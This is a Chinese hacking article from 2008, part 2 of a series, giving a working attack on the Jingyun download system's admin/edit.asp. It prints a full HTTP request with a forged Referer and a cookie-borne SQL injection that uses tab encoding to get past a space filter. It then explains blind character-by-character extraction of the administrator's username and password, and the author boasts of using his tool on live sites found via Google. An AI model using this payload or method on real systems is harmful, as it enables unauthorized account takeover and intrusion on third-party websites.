惊云下载系统又暴惊天漏洞(2)
发布时间:2008-03-09 18:32:00
到底如何利用呢?当然最好是搞定管理员的用户和密码拉。
我用WSE抓包后,整理如下(以我自己的机器做实验)
POST /admin/edit.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
1 Referer: http://localhost/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost
Content-Length: 125
Connection: Keep-Alive
cache-Control: no-cache
2 Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=aaaaaaaa'%09union%09select%09*%09from%09userinfo%09where%09id%3D1%09and%09len(pwd)%3D1%09and%09'1%3D1
type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oicq=33337788&email=fsadf@fsf.com&homepage=&qm=&softurl=&b1=%C8%B7%C8%CF%D0%DE%B8%C4
上面两处是需要注意的,有序号。其他地方随便添,按照我上面的就行了。
1处是为了逃避上面讲到的防网页不是从点击近来的,把这个值设为网址就行了,没什么好讲的。
2处是最关键的,我上面提到了COOKIE欺骗,这里不但要欺骗还有注入。
JyDownUserName这个值我们把它设为了
aaaaaaaa' union select * from userinfo where id=1 and len(pwd)=1 and '1=1
这个。上面是经过编码的。其中%09是TAB键的编码,为了躲过空格过滤。它和空格是等价的,真的谢谢MS工程师开发软件总是为用户着想,生怕功能不强。
程序作者只过滤了空格欠考虑。
把上面的值代入到原程序总就变为了(应该学过代数啊,呵呵)
select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and len(user)=1 and '1=1'
那个a串没什么意义,就是为了使前面语句为假,没有这个用户就行了,可以是任意特殊字符串。后面的SELECT是重点。
ID=1是猜id为1的用户,其实就是管理员用户。不过有的管理员可能改了,那就不灵了。猜他的长度是不是1。
很显然是1可能性很小,不要紧,猜错了,会返回“错误:....用户资料读取错误,请重新登陆!”中间省了一部分。
我们把语句换成
select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and len(user)=2 and '1=1'
返回“错误:....用户资料读取错误,请重新登陆!”,看来用户名长度也不是2,再换。
换到5是返回 "错误:原密码错误!",看来用户名长度就是5了。同样方法猜出密码长度7。
该猜字符。
select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and asc(mid(user,1,1)=40 and '1=1'
上面的语句大家能看懂吧?用mid函数是截取一个字符,然后转换成ASCII码,再和40比较。返回错误,说明user的第一个字符ASCII值不是40。
猜到97的时候返回"错误:原密码错误!",说明用户名第一个字符是a 。
以此类推,猜出user是admin,pwd是abcdefg.管理员的用户密码猜出来了。
上面的过程显然不可能手工输入和猜测,必须依靠工具。现成的也没有这种工具,鄙毕人就抽了宝贵的打牌(QQ升级)时间了写了个程序,很快就猜出来了。上面是方法。
我用我写的程序在网上实验,真是无往不利。就是在GOOGLE上搜惊云系统,管理员很快猜出来了。
我登陆一个网站后,发现有个地方可以上传文件。我回过头读源代码,发现了和动网一样的文件上传漏洞,都是在路径上没做检查,允许远程命名文件名。
0
投稿猜你喜欢
- 服务器数据存储安全是保障服务器正常运行的重要的环节,同时也是企业网络信息化建设的核心。每一家企业的管理层人员都非常重视存储在服务器的重要数据
- 一、GOOGLE搜索引擎蜘蛛的等级首先先谈下GOOGLE蜘蛛起源。当GOOGLE搜索引擎刚建立之初,就拥有这一个非常强大的的服务器,其每天放
- 亲爱的,今天是我们两个认识1周年的日子,除了送你一个新的512M的内存当礼物外,我还想对你说几句知心话。 我知道你很漂亮,在同龄的女孩子里都
- 服务器虚拟化只需要较少的硬件资源就能运行多重应用程序和操作系统,能允许用户根据自身需求快速调配新的资源。但是这些灵活性也导致网络和安全管理者
- 其实网上已经很多这样的文章了,但是我遇到的情况用网上的方法不好用,这几天弄我那服务器弄的脑袋都大了,总出问题 昨天ASP又连接不
- 核心提示:在搜索引擎优化上面,为使得效果更加明显,问题简单快速解决,大家对站点的静态化趋之若骛。然而对于一些大型网站,静态化带来的问题和后续
我们使用的是/usr/local/apache2.4/conf/extra/httpd-vhosts.conf配置文件下的第二段配置,它的日- 调整Discuz 帖内图片最大宽度,发现只调整“系统设置→界面→界面管理→帖子内容页→帖内图片最大宽度”并不行,原来在Discuz 7.1中
- 来学习一下多次执行同一条命令的不同类型的循环。awk 脚本有三个主要部分:BEGIN 和 END 函数(都可选),用户自己写的每次要执行的函
- 目前,市场上有多种Internet邮件服务器产品供选择,这些邮件服务器产品价格各异,所提供的功能也有不少差别。对于网络管理员来说,如何根据自
- 前些日子买了三个广告位结果点击率只有0.02%仔细一看怪自己那会太天真,上当了而且还不知道那几个点击是不是真实的。 &
- 新手站长,做站前一定要明确自己的站点主题是什么,即要清楚自己的站大方向是什么。还是一句老话,新站起步,别好高骛远!别想着一步登天,做综合类站
- 网聊时代,大家总是喜欢寻找更多的快乐,所以我们看到了火星文、看到了搞笑的聊天表情、看到了QQ闪字…。这些,都是我们网上网下生活的调剂。今天,
- 在Windows IIS 6.0下配置PHP,通常有CGI、ISAPI和FastCGI三种配置方式,这三种模式都可以在IIS 6.0下成功运
- Linux系统中有两种计划任务,一种是只会执行一次 at 计划任务,一种是可以周期性地执行的 cron 计划任务at 一次性计划任务描述在指
- 我是侠客,自从创办“侠客站长站”的过程中,我真正的了解了我自己。如果,你想了解侠客站长站的成长,可以搜索“侠客站长站”的域名注册时间、ale
- 在你调用文章列表的标签里写上[field:pubdate runphp='yes'] $a
- 据Google中文网站管理员博客报道,Google在其网站管理员工具中新增了一个“增强型 404 页面” 工具,登录Google网站管理员后
- 著名SEO网站SEOMOZ今年调查得出的一份“影响搜索引擎排名因素的报告”。他们每两件做这样一个调查,调查对象是全世界各地的SEO专家。然后
- 有几个朋友反应,在使用系统的图集功能上传图片时会提示FILEID:X错误,缩略图显示为红色
